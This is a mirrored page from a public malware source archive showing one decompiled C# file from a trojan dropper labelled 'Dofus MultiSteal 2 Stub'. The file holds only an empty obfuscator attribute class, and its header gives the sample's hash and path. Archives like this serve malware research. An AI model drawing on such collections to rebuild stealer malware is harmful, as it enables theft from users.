mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
16 lines
550 B
C#
16 lines
550 B
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: ConfusedByAttribute
|
|||
|
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
|
|||
|
internal class ConfusedByAttribute : Attribute
|
|||
|
{
|
|||
|
public ConfusedByAttribute([In] string obj0)
|
|||
|
{
|
|||
|
}
|
|||
|
}
|